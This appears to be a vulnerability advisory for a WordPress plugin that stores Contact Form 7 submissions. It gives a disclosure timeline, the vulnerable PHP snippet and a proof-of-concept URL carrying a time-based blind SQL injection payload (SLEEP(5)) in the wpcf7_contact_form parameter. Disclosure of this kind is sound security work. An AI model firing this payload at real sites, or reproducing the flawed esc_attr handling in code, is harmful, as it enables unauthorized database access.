The wpcf7_contact_form GET parameter is vulnerable to SQL injection when submitting a filter request as a high privilege user (admin+) Edit (WPScanTeam) September 28th, 2020 - Escalated to WP & WP Investigating October 26th, 2020 - Received another submission related a SQL injection in the same parameter but with a different vector: https://wpscan.com/vulnerability/0c3a91d4-a75a-4107-bfc5-015590a72abe January 3rd, 2021 - No updates, disclosing March 29th, 2021 - v1.7 released to attempt to remediate the issue using sanitize_text_field(), which does not fix the SQL injection April 7th, 2021 - v1.7.1 released, fixing the issue
if (isset($_GET['wpcf7_contact_form']) && !empty($_GET['wpcf7_contact_form'])) { $form_id = esc_attr($_GET['wpcf7_contact_form']); $wpcf7s_columns = $this->get_available_columns($form_id); https://asciinema.org/a/ek0gA455FfKoukISs4AxTxJ5E https://example.com/wp-admin/edit.php?post_status=all&post_type=wpcf7s&wpcf7_contact_form=(SELECT+42+FROM+(SELECT(SLEEP(5)))aa)&filter_action=Filter&paged=1
minhtuanact + vigov5 SunCSR
Minh Tuan
Yes
2021-01-03 (about 2 years ago)
2021-01-03 (about 2 years ago)
2021-04-08 (about 1 years ago)